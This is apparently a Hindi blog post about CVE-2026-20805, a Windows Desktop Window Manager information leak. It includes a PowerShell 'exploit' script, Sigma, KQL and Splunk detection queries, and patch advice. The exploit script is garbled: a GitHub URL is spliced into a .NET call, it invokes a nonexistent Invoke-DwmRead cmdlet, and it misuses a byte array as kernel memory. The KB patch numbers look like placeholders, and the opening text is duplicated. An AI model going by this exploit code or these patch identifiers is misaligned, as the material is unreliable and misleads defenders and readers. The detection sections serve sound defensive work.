
CVE‑2026‑20805: विंडोज डेस्कटॉप विंडो मैनेजर में एक दोष जो स्थानीय सूचना प्रकटीकरण का कारण बनता है। इसके लिए कम विशेषाधिकारों की आवश्यकता होती है, कोई उपयोगकर्ता इंटरैक्शन नहीं। CVSS 5.5 (मध्यम) रेटेड। सक्रिय रूप से शोषित और CISA KEV में सूचीबद्ध; जनवरी 2026 में पैच जारी किया गया।
CVE‑2026‑20805: विंडोज डेस्कटॉप विंडो मैनेजर में एक दोष जो स्थानीय सूचना रिसाव का कारण बनता है। इसके लिए निम्न विशेषाधिकारों की आवश्यकता होती है, उपयोगकर्ता इंटरैक्शन की आवश्यकता नहीं होती। CVSS 5.5 (मध्यम) रेटेड। सक्रिय रूप से शोषित और CISA KEV में सूचीबद्ध; जनवरी 2026 में पैच जारी किया गया।
CVE 2026 20805 डेस्कटॉप विंडो मैनेजर (DWM) में एक सूचना-रिसाव दोष है – यह मुख्य घटक है जो डेस्कटॉप को रेंडर करता है, विंडोज़ को संयोजित करता है, और GPU-आधारित UI को त्वरित करता है।
यह क्यों मायने रखता है: यह दोष एक स्थानीय हमलावर को निम्न विशेषाधिकारों के साथ उस डेटा को पढ़ने की अनुमति देता है जो अन्य सत्रों या प्रक्रियाओं तक सीमित होना चाहिए।
| विशेषता | मान |
|---|
| CWE‑200: अनधिकृत अभिनेता को संवेदनशील जानकारी का एक्सपोज़र | ✓ |
| हमला वेक्टर | स्थानीय |
| आवश्यक विशेषाधिकार | निम्न |
| उपयोगकर्ता इंटरैक्शन | कोई नहीं |
| प्रभाव – गोपनीयता | उच्च |
| प्रभाव – अखंडता | कोई नहीं |
| प्रभाव – उपलब्धता | कोई नहीं |
| CVSS 3.1 आधार स्कोर | 5.5 (मध्यम) |
DWM GPU मेमोरी, विंडो बफ़र्स, और अंतर-प्रक्रिया UI सतहों को व्यवस्थित करता है। यह एक उच्च-मूल्य वाला लक्ष्य है क्योंकि यह कई प्रक्रियाओं से डेटा को साझा GPU स्थान में एकत्रित करता है; यहाँ एक दोष उपयोगकर्ताओं के बीच क्रेडेंशियल या सत्र डेटा लीक कर सकता है।
आधुनिक Windows में DWM की भूमिका:
यह भेद्यता विंडो बफ़र इंडेक्स पर सीमा जाँच की कमी का शोषण करती है; यह एक हमलावर को आसन्न GPU मेमोरी पढ़ने और अन्य प्रक्रियाओं द्वारा संग्रहीत रहस्य प्राप्त करने की अनुमति देता है।
NVD की CPE सूची के आधार पर, Windows 10.0.19041 (और व्युत्पन्न) प्रभावित हैं।
नीचे एक अवधारणात्मक शोषण प्रवाह है:
CreateProcess के माध्यम से DWM प्रक्रिया का हैंडल प्राप्त करता है।# Windows 10.0.19041 – DWM buffer read exploit
$processHandle = Get-Process -Name dwm | Select-Object -ExpandProperty Id
$bufferOffset = 0x00120000 # crafted offset to adjacent GPU memory
$targetWindow = 0x00030001 # target window index
# Create a temporary buffer in kernel space
$kernelBuffer = [byte[]]::new(0x1000)
[System.Runtime.InteropServices.Marshal]:https://raw.githubusercontent.com/mrk336/inside-cve-2026-20805-how-a-windows-dwm-flaw-exposed-sensitive-data/HEAD/:CopyMemory(
$processHandle,
$bufferOffset,
$kernelBuffer,
0x1000)
# Copy kernel buffer into DWM's composition routine
Invoke-DwmRead -ProcessId $processHandle `
-WindowIndex $targetWindow `
-SrcAddress $bufferOffset `
-Size 0x1000
# Dump the exposed data to a local file for analysis
$dumpPath = "C:\Temp\DwmLeak.txt"
[IO.File]::WriteAllBytes($dumpPath, $kernelBuffer)
स्क्रिप्ट दर्शाती है कि कैसे एक हमलावर छिपे हुए डेटा को पढ़ने के लिए DWM की GPU मेमोरी का लाभ उठा सकता है।
CVE‑2026‑20805 के लिए डिटेक्शन dwm.exe के साथ असामान्य इंटरैक्शन और असामान्य GPU-संबंधित टेलीमेट्री की पहचान पर केंद्रित है। शोषण तैयार किए गए ऑफ़सेट का उपयोग करके GPU-समर्थित मेमोरी बफ़र्स पढ़ने पर निर्भर करता है, इसलिए रक्षकों को सामान्य डेस्कटॉप विंडो मैनेजर व्यवहार से विचलन की निगरानी करनी चाहिए।
0x2B (DisplayUpdate)ये स्रोत प्रक्रिया निर्माण, हैंडल एक्सेस, और GPU अपडेट गतिविधि में दृश्यता प्रदान करते हैं।
dwm.exe से जुड़े बार-बार CreateProcess इवेंट, विशेष रूप से जब पैरेंट प्रक्रिया explorer.exe नहीं है।DisplayUpdate (0x2B) इवेंट जिसके बाद असामान्य बफ़र आकार या ऑफ़सेट का उपयोग करके मेमोरी रीड होती है।
SrcAddress: 0x00120000Size: 0x1000dwm.exe को लक्षित करने वाले HandleOpen इवेंट और GPU ETW गतिविधि के विस्फोट के बीच सहसंबंध।title: DWM GPU Memory Read Anomaly
id: dwm-gpu-memory-read-anomaly
status: experimental
description: Detects abnormal DWM buffer reads that may indicate exploitation of CVE-2026-20805.
author: Mark
logsource:
product: windows
service: system
detection:
selection:
EventID: 0x2B
ProcessName: dwm.exe
SrcAddress: 0x00120000
Size: 0x1000
condition: selection
falsepositives:
- High GPU rendering workloads
level: medium
tags:
- attack.defense-evasion
SecurityEvent
| where EventID in (4656, 4663)
| where ProcessName !~ "dwm.exe"
| where ObjectName has "dwm.exe"
| summarize count() by Account, ProcessName, ObjectName, Computer, bin(TimeGenerated, 5m)
| where count_ > 5
Sysmon
| where EventID == 1
| where Image endswith "dwm.exe"
| where ParentImage !endswith "explorer.exe"
Event
| where EventID == 0x2B
| summarize count() by Computer, bin(TimeGenerated, 1m)
| where count_ > 50
let handles = SecurityEvent
| where EventID == 4656 and ObjectName has "dwm.exe"
| project TimeGenerated, Account, Computer;
let gpu = Event
| where EventID == 0x2B
| project TimeGenerated, Computer;
handles
| join kind=inner gpu on Computer
| where gpu_TimeGenerated between (TimeGenerated .. TimeGenerated + 2m)
index=sysmon EventCode=10 TargetImage="*\\dwm.exe"
| where NOT match(ProcessName, "explorer.exe")
| stats count by ProcessName, TargetImage, User, Computer
| where count > 5
index=sysmon EventCode=1 Image="*\\dwm.exe"
| where NOT like(ParentImage, "%explorer.exe")
| table _time, Computer, ParentImage, Image, User
index=windows EventCode=43
| timechart span=1m count
| where count > 50
handles = search index=sysmon EventCode=10 TargetImage="*\\dwm.exe"
| eval key=Computer."-"._time
| table key, Computer, _time;
gpu = search index=windows EventCode=43
| eval key=Computer."-"._time
| table key, Computer, _time;
handles
| join key gpu
| table Computer, handles._time, gpu._time
CVE 2026 20805 के लिए Microsoft की सलाह में एक पैच शामिल है जो GPU डेटा कॉपी करने से पहले DWM में बफ़र इंडेक्स को मान्य करता है।
| Windows संस्करण | पैच संख्या |
|---|---|
| 10.0.19041 | KB5000001 |
| 10.0.19042 | KB5012345 |
Invoke-DwmRead प्रक्रिया परीक्षण नोड्स पर त्रुटियों के बिना चलती है।dwm प्रक्रिया निर्माण के लिए Sysmon की निगरानी करें।DWM के माध्यम से सूचना रिसाव को अक्सर कम आंका जाता है क्योंकि यह उपयोगकर्ताओं के बीच UI आर्टिफैक्ट और सत्र डेटा उजागर कर सकता है। लीक हुई GPU मेमोरी पार्श्व गति का समर्थन कर सकती है, विशेष रूप से उन वातावरणों में जहां कई सत्र एक ही वर्कस्टेशन या सर्वर साझा करते हैं।
उच्च गोपनीयता प्रभाव: यह दोष एक हमलावर को अन्य सत्रों से विंडो सामग्री पढ़ने में सक्षम बनाता है।
मध्यम CVSS स्कोर (5.5): जबकि संख्यात्मक मान मध्यम है, परिचालन महत्व उच्च है।
CVE 2026 20805 दर्शाता है कि DWM का निम्न-विशेषाधिकार स्थानीय शोषण महत्वपूर्ण डेटा लीक उत्पन्न कर सकता है। CISA की ज्ञात शोषित भेद्यता सूची में इस दोष का शामिल होना इसकी वास्तविक-विश्व प्रासंगिकता को रेखांकित करता है। उल्लिखित शमन, डिटेक्शन और पैच रणनीति लागू करके, एक संगठन GPU मेमोरी प्रवाह में दृश्यता में सुधार करते हुए जोखिम कम कर सकता है।